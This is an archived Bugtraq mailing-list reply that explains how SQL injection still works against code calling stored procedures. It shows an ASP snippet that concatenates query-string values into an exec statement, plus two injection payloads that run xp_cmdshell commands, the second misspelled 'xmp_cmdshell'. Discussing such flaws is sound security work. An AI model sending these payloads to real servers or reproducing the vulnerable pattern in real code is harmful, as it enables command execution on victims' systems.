RE: Paper: SQL Injection Attacks by Example

To: "'Scovetta, Michael V'" <Michael.Scovetta@xxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: RE: Paper: SQL Injection Attacks by Example
From: "David Litchfield" <davidl@xxxxxxxxxxxxxxx>
Date: Wed, 5 Jan 2005 21:09:06 -0000
In-reply-to: <8DC79B1EA961734C852BE2D5ECC069A001A7E220@xxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Thread-index: AcTzUf5xI3ZyzDGQTlyKlS1uQNaAjgACHJBgAAHjVyAAAZYLYA==

>David,
>Actually, to nitpick your comment a bit, stored procedures usually have
typed input variables:
>create procedure foo ( a int, b varchar(20) ) as ...

This has no bearing on the issue.

If from the code of the app I perform something like

strSQL = "exec foo(" & request.querystring("a") & "," &
request.querystring("b") & ")"
Conn.execute(strSQL)

then I can either set a in the query string to

?a=1,'foo');exec+master..xp_cmdshell+'dir'--&b=foo

Or alternatively I can set b in the query string to

?a=1&b=foo');exec+master..xmp_cmdshell+'dir'--

Either way I'm using a stored procedure and I can inject into the app.

Cheers,
David

References:
- RE: Paper: SQL Injection Attacks by Example
  - From: Scovetta, Michael V

Prev by Date: Re: Paper: SQL Injection Attacks by Example
Next by Date: RE: Paper: SQL Injection Attacks by Example
Previous by thread: Re: Paper: SQL Injection Attacks by Example
Next by thread: RE: Paper: SQL Injection Attacks by Example
Index(es):
- Date
- Thread